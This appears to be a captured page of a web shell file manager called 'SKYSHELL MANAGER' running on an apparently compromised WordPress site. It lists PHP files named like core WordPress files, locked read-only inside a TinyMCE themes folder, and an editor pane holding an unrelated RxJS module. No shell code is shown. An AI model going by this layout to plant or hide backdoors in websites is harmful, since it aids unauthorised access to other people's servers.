📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: toArray.js
import { reduce } from './reduce'; import { operate } from '../util/lift'; var arrReducer = function (arr, value) { return (arr.push(value), arr); }; export function toArray() { return operate(function (source, subscriber) { reduce(arrReducer, [])(source).subscribe(subscriber); }); } //# sourceMappingURL=toArray.js.map
Save